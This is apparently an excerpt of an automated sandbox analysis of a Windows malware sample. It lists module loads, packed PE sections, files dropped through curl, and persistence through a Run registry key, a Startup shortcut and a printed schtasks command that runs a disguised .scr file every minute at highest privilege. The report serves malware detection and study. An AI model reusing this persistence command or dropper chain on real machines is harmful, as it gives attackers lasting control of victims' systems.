Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll
Source: C:\Users\Public\winnotify.scr Section loaded: apphelp.dll
Source: C:\Users\Public\winnotify.scr Section loaded: version.dll
Source: C:\Users\Public\winnotify.scr Section loaded: mscoree.dll
Source: C:\Users\Public\winnotify.scr Section loaded: shfolder.dll
Source: C:\Users\Public\winnotify.scr Section loaded: uxtheme.dll
Source: C:\Users\Public\winnotify.scr Section loaded: windows.storage.dll
Source: C:\Users\Public\winnotify.scr Section loaded: wldp.dll
Source: C:\Users\Public\winnotify.scr Section loaded: profapi.dll
Source: C:\Users\Public\winnotify.scr Section loaded: sspicli.dll
Source: C:\Users\Public\winnotify.scr Section loaded: kernel.appcore.dll
Source: C:\Users\Public\winnotify.scr Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\Public\winnotify.scr Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Public\winnotify.scr Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Public\winnotify.scr Section loaded: amsi.dll
Source: C:\Users\Public\winnotify.scr Section loaded: userenv.dll
Source: C:\Users\Public\winnotify.scr Section loaded: msasn1.dll
Source: C:\Users\Public\winnotify.scr Section loaded: gpapi.dll
Source: C:\Users\Public\winnotify.scr Section loaded: cryptsp.dll
Source: C:\Users\Public\winnotify.scr Section loaded: rsaenh.dll
Source: C:\Users\Public\winnotify.scr Section loaded: cryptbase.dll
Source: C:\Users\Public\winnotify.scr Section loaded: version.dll
Source: C:\Users\Public\winnotify.scr Section loaded: mscoree.dll
Source: C:\Users\Public\winnotify.scr Section loaded: shfolder.dll
Source: C:\Users\Public\winnotify.scr Section loaded: uxtheme.dll
Source: C:\Users\Public\winnotify.scr Section loaded: windows.storage.dll
Source: C:\Users\Public\winnotify.scr Section loaded: wldp.dll
Source: C:\Users\Public\winnotify.scr Section loaded: profapi.dll
Source: C:\Users\Public\winnotify.scr Section loaded: sspicli.dll
Source: C:\Users\Public\winnotify.scr Section loaded: kernel.appcore.dll
Source: C:\Users\Public\winnotify.scr Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\Public\winnotify.scr Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Public\winnotify.scr Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Public\winnotify.scr Section loaded: amsi.dll
Source: C:\Users\Public\winnotify.scr Section loaded: userenv.dll
Source: C:\Users\Public\winnotify.scr Section loaded: msasn1.dll
Source: C:\Users\Public\winnotify.scr Section loaded: gpapi.dll
Source: C:\Users\Public\winnotify.scr Section loaded: cryptsp.dll
Source: C:\Users\Public\winnotify.scr Section loaded: rsaenh.dll
Source: C:\Users\Public\winnotify.scr Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32 Jump to behavior
Source: winnotify.lnk.24.dr LNK file: ..\..\..\..\..\..\..\..\Public\winnotify.scr
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: ZOL2mIYAUH.exe Static file information: File size 1144320 > 1048576
Source: Binary string: srtware.pdb source: ZOL2mIYAUH.exe, ZOL2mIYAUH.exe, 00000000.00000002.3688530749.00000000001C2000.00000040.00000001.01000000.00000003.sdmp

Data Obfuscation

barindex
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Unpacked PE file: 0.2.ZOL2mIYAUH.exe.1c0000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;.rsrc:EW;Unknown_Section4:EW;.d5scxa2:EW; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:R;.rsrc:ER;Unknown_Section4:ER;.d5scxa2:ER;
Source: C:\Users\gbcd\fff.scr Unpacked PE file: 23.2.fff.scr.a50000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;.rsrc:EW;Unknown_Section4:EW;.d5dcvew:EW; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:R;.rsrc:ER;Unknown_Section4:ER;.d5dcvew:ER;
Source: C:\Users\gbcd\qqq.scr Unpacked PE file: 24.2.qqq.scr.4c0000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;.rsrc:EW;Unknown_Section4:EW;.stovfcw:EW; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:R;.rsrc:ER;Unknown_Section4:ER;.stovfcw:ER;
Source: C:\Users\Public\winnotify.scr Unpacked PE file: 37.2.winnotify.scr.450000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;.rsrc:EW;Unknown_Section4:EW;.stovfcw:EW; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:R;.rsrc:ER;Unknown_Section4:ER;.stovfcw:ER;
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Unpacked PE file: 0.2.ZOL2mIYAUH.exe.1c0000.0.unpack
Source: C:\Users\gbcd\fff.scr Unpacked PE file: 23.2.fff.scr.a50000.0.unpack
Source: C:\Users\Public\winnotify.scr Unpacked PE file: 37.2.winnotify.scr.450000.0.unpack
Source: ZOL2mIYAUH.exe Static PE information: 0xF0336014 [Fri Sep 13 08:19:32 2097 UTC]
Source: ZOL2mIYAUH.exe Static PE information: section name:
Source: ZOL2mIYAUH.exe Static PE information: section name:
Source: ZOL2mIYAUH.exe Static PE information: section name:
Source: ZOL2mIYAUH.exe Static PE information: section name:
Source: ZOL2mIYAUH.exe Static PE information: section name: .d5scxa2
Source: fff.scr.14.dr Static PE information: section name:
Source: fff.scr.14.dr Static PE information: section name:
Source: fff.scr.14.dr Static PE information: section name:
Source: fff.scr.14.dr Static PE information: section name:
Source: fff.scr.14.dr Static PE information: section name: .d5dcvew
Source: qqq.scr.16.dr Static PE information: section name:
Source: qqq.scr.16.dr Static PE information: section name:
Source: qqq.scr.16.dr Static PE information: section name:
Source: qqq.scr.16.dr Static PE information: section name:
Source: qqq.scr.16.dr Static PE information: section name: .stovfcw
Source: ddd.scr.19.dr Static PE information: section name: .00cfg
Source: srtware.exe.21.dr Static PE information: section name: _RDATA
Source: winnotify.scr.24.dr Static PE information: section name:
Source: winnotify.scr.24.dr Static PE information: section name:
Source: winnotify.scr.24.dr Static PE information: section name:
Source: winnotify.scr.24.dr Static PE information: section name:
Source: winnotify.scr.24.dr Static PE information: section name: .stovfcw
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Code function: 0_2_003507A4 push ecx; mov dword ptr [esp], ecx 0_2_003507A5
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Code function: 0_2_00204104 push ecx; mov dword ptr [esp], edx 0_2_00204109
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Code function: 0_2_0020432C push ecx; mov dword ptr [esp], edx 0_2_00204331
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Code function: 0_2_002013A0 push 00201400h; ret 0_2_002013F8
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Code function: 0_2_001F03EA push 001F0418h; ret 0_2_001F0410
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Code function: 0_2_001F0424 push 001F0450h; ret 0_2_001F0448
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Code function: 0_2_001F045C push 001F0488h; ret 0_2_001F0480
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Code function: 0_2_00204448 push ecx; mov dword ptr [esp], edx 0_2_0020444D
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Code function: 0_2_00202454 push 002024A1h; ret 0_2_00202499
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Code function: 0_2_00201456 push 002015A4h; ret 0_2_0020159C
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Code function: 0_2_001F0494 push 001F04C0h; ret 0_2_001F04B8
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Code function: 0_2_0020448C push ecx; mov dword ptr [esp], edx 0_2_00204491
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Code function: 0_2_001F04F8 push 001F052Ch; ret 0_2_001F0524
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Code function: 0_2_00200536 push 002005B5h; ret 0_2_002005AD
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Code function: 0_2_001F855C push 001F86D8h; ret 0_2_001F86D0
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Code function: 0_2_001EE5F0 push 001EE641h; ret 0_2_001EE639
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Code function: 0_2_001FF62C push 001FF6A2h; ret 0_2_001FF69A
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Code function: 0_2_00201684 push ecx; mov dword ptr [esp], ecx 0_2_00201687
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Code function: 0_2_001FF6A4 push 001FF74Ch; ret 0_2_001FF744
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Code function: 0_2_001F86DA push 001F874Bh; ret 0_2_001F8743
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Code function: 0_2_001F0738 push 001F085Ch; ret 0_2_001F0854
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Code function: 0_2_001FF74E push 001FF79Ch; ret 0_2_001FF794
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Code function: 0_2_00200804 push 00200830h; ret 0_2_00200828
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Code function: 0_2_001F885E push 001F888Ch; ret 0_2_001F8884
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Code function: 0_2_001EE8AA push 001EE8D8h; ret 0_2_001EE8D0
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Code function: 0_2_002018F4 push ecx; mov dword ptr [esp], ecx 0_2_002018F6
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Code function: 0_2_001EE968 push 001EE994h; ret 0_2_001EE98C
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Code function: 0_2_001EFA48 push ecx; mov dword ptr [esp], eax 0_2_001EFA49
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Code function: 0_2_001EFCF2 push 001EFD20h; ret 0_2_001EFD18
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Code function: 0_2_001EFD2C push 001EFD58h; ret 0_2_001EFD50
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Code function: 0_2_001F7D60 push ecx; mov dword ptr [esp], edx 0_2_001F7D65
Source: ZOL2mIYAUH.exe Static PE information: section name: entropy: 7.994421110466154
Source: ZOL2mIYAUH.exe Static PE information: section name: .d5scxa2 entropy: 7.981383442410946
Source: fff.scr.14.dr Static PE information: section name: entropy: 7.998403010941839
Source: fff.scr.14.dr Static PE information: section name: .d5dcvew entropy: 7.9897294929740825
Source: qqq.scr.16.dr Static PE information: section name: entropy: 7.998320875900243
Source: qqq.scr.16.dr Static PE information: section name: .stovfcw entropy: 7.980115132528779
Source: winnotify.scr.24.dr Static PE information: section name: entropy: 7.998320875900243
Source: winnotify.scr.24.dr Static PE information: section name: .stovfcw entropy: 7.980115132528779

Persistence and Installation Behavior

barindex
Source: C:\Users\gbcd\qqq.scr File created: C:\Users\Public\winnotify.scr Jump to dropped file
Source: C:\Windows\SysWOW64\curl.exe File created: C:\Users\gbcd\qqq.scr Jump to dropped file
Source: C:\Windows\SysWOW64\curl.exe File created: C:\Users\gbcd\fff.scr Jump to dropped file
Source: C:\Windows\SysWOW64\curl.exe File created: C:\Users\gbcd\ddd.scr Jump to dropped file
Source: C:\Users\gbcd\qqq.scr File created: C:\Users\Public\winnotify.scr Jump to dropped file
Source: C:\Windows\SysWOW64\curl.exe File created: C:\Users\gbcd\qqq.scr Jump to dropped file
Source: C:\Windows\SysWOW64\curl.exe File created: C:\Users\gbcd\fff.scr Jump to dropped file
Source: C:\Windows\SysWOW64\curl.exe File created: C:\Users\gbcd\srtware.exe Jump to dropped file
Source: C:\Windows\SysWOW64\curl.exe File created: C:\Users\gbcd\ddd.scr Jump to dropped file
Source: C:\Users\gbcd\qqq.scr File created: C:\Users\Public\winnotify.scr Jump to dropped file
Source: C:\Windows\SysWOW64\curl.exe File created: C:\Users\gbcd\qqq.scr Jump to dropped file
Source: C:\Windows\SysWOW64\curl.exe File created: C:\Users\gbcd\fff.scr Jump to dropped file
Source: C:\Windows\SysWOW64\curl.exe File created: C:\Users\gbcd\srtware.exe Jump to dropped file
Source: C:\Windows\SysWOW64\curl.exe File created: C:\Users\gbcd\ddd.scr Jump to dropped file

Boot Survival

barindex
Source: C:\Users\gbcd\qqq.scr Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run winnotify C:\Users\Public\winnotify.scr Jump to behavior
Source: C:\Users\gbcd\qqq.scr File created: C:\Users\Public\winnotify.scr Jump to dropped file
Source: C:\Windows\SysWOW64\curl.exe File created: C:\Users\gbcd\qqq.scr Jump to dropped file
Source: C:\Windows\SysWOW64\curl.exe File created: C:\Users\gbcd\fff.scr Jump to dropped file
Source: C:\Windows\SysWOW64\curl.exe File created: C:\Users\gbcd\srtware.exe Jump to dropped file
Source: C:\Windows\SysWOW64\curl.exe File created: C:\Users\gbcd\ddd.scr Jump to dropped file
Source: C:\Users\gbcd\qqq.scr Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "winnotify" /tr "C:\Users\Public\winnotify.scr"
Source: C:\Users\gbcd\qqq.scr File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winnotify.lnk Jump to behavior
Source: C:\Users\gbcd\qqq.scr File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winnotify.lnk Jump to behavior
Source: C:\Users\gbcd\qqq.scr Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run winnotify Jump to behavior
Source: C:\Users\gbcd\qqq.scr Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run winnotify Jump to behavior

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
